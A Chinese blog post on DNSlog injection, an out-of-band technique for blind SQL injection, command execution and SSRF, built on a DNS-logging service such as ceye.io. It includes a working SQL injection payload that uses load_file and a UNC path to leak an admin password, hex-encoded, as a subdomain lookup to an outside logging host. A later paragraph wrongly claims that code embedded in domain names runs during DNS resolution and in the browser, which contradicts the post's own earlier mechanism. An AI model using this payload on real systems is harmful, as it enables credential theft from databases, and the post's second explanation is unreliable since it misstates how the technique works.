DNSlog注入

DNSlog注入产生

测试一些网站的时候,一些注入都是无回显的,可以通过写脚本来进行盲注,但有些网站会ban掉我们的ip,可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入。

DNSlog注入应用场景

sql注入的盲注、无回显的命令执行、无回显的SSRF

DNSlog注入原理

有一个可以配置的域名(比如:ceye.io),然后通过代理商设置域名(ceye.io)的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了,如下图所示:

注入语句:http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\abc'))

DNSLog注入是一种利用DNS协议的安全漏洞进行攻击的方法。它利用了DNS服务器对于域名解析请求的处理方式,通过在恶意构造的域名中插入恶意代码,从而实现对目标系统的攻击或信息收集。 具体的注入原理如下: 1. DNS解析过程:当用户在浏览器中输入一个URL并发送请求时,操作系统会将URL发送给本地DNS服务器进行解析。DNS服务器会向根域名服务器发起查询请求,逐级查询直到找到对应的IP地址。 2. 恶意域名构造:攻击者构造一个恶意域名,其中包含了恶意代码或者指向恶意服务器的IP地址。恶意代码可以是任意可执行的代码,如JavaScript代码、Shell命令等。 3. DNS解析注入:攻击者向本地DNS服务器发送一个查询请求,并在请求中包含恶意域名。本地DNS服务器在解析该域名时,会向上级DNS服务器发起查询请求,直到找到对应的IP地址。在这个查询过程中,恶意代码会被执行。 4. 恶意代码执行:当上级DNS服务器将查询结果返回给本地DNS服务器时,本地DNS服务器会将结果返回给用户的操作系统。操作系统接收到结果后,会将其交给浏览器进行处理。如果结果中包含恶意代码,浏览器会执行该代码。 通过以上的注入原理,攻击者可以实现对目标系统的攻击,如执行恶意脚本、获取敏感信息等。为了防止DNSLog注入攻击,可以采取一些安全措施,如使用DNSSEC来验证DNS响应的真实性、限制DNS解析的递归查询等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值